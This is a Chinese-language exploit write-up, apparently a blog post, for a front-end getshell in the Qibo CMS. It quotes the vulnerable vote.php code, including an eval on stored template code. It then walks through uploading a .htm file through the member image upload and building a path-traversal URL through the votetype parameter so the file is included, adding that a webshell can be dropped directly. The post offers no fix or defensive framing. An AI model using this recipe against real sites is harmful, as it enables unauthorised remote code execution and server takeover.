qibo前台getshell

注册个用户,到管理中心,发表文章,CKFINDER上传 你懂得!

上传之后路径为:http://127.0.0.1/upload_Ffiles/ck/images/
关键字:自己动手,丰衣足食

危害:利用上传功能上传一个htm文件,利用一个包含漏洞直接获取shell,无需截断

elseif($job=="show")
{
	if(!$cid){
		showerr("CID不存在",1);
	}
	unset($listdb,$numdb,$max,$widthdb);
	
	$query = $db->query("SELECT C.about,C.type,C.votetype,C.tplcode,C.ifcomment,V.* FROM {$pre}vote_topic C LEFT JOIN {$pre}vote_element V ON C.cid=V.cid WHERE C.cid='$cid' ORDER BY V.list DESC");
	$total=0;

	while($rs = $db->fetch_array($query)){
		$total=$total+$rs[votenum];
		if($rs[type]==1){
			$button=$rs[type]="<input type='radio' name='voteId' value='$rs[id]' style='border:0px;'>";
		}else{
			$button=$rs[type]="<input type='checkbox' name='voteId[]' value='$rs[id]' style='border:0px;'>";
		}
		

		//复制JS的
		$i++;
		$votenum=$rs[votenum];
		$title=$rs[title];
		$img=tempdir($rs[img]);
		$url=$rs[url];
		$id=$rs[id];
		$cid=$rs[cid];
		$tplcode=str_replace('"','\"',$rs[tplcode]);
		$describes=$rs[describes];
		if($votetype==2&&$i>1){
			$shows.="<div style='float:left;'><img src='$webdb[www_url]/images/default/votevs.gif'></div>";
		}
		eval("\$shows.=\"$tplcode\";");
		$votetype=$rs[votetype];
		//复制JS的

		$about=$rs[about];
		$ifcomment=$rs[ifcomment];
		$listdb[$rs[id]]=$rs;
		$numdb[$rs[id]]=$rs[votenum];
	}
	arsort($numdb);
	$max=0;
	foreach($numdb AS $key=>$value){
		if(!$max&&$value){
			$max=$value;
			$widthdb[$key]=311;
		}else{
			$widthdb[$key]=ceil(310*$value/$max)+1;
		}
	}
	$path=$votetype?"vote_$votetype":'vote'; //vote来得到path的具体路径
	require(ROOT_PATH."inc/head.php");
	require(getTpl($path));                  //包含了path
	require(ROOT_PATH."inc/foot.php");
}

利用过程:
写一个htm扩展名的文件,内容,当然也可以直接写木马,嘿嘿
在会员中心,发布图片位置,上传, 这里是允许上传htm类型文件的
ͼƬ2
取出文件路径:article//2_20131010221009_n0os7.htm
构造攻击URL:

/vote/vote.php?job=show&cid=1&votetype=js/../../../../upload_files/article/2_20131010221009_n0os7

注意URL最后不要加 .htm
因为代码getTpl 方法会自动追加.htm
ͼƬ1

发表评论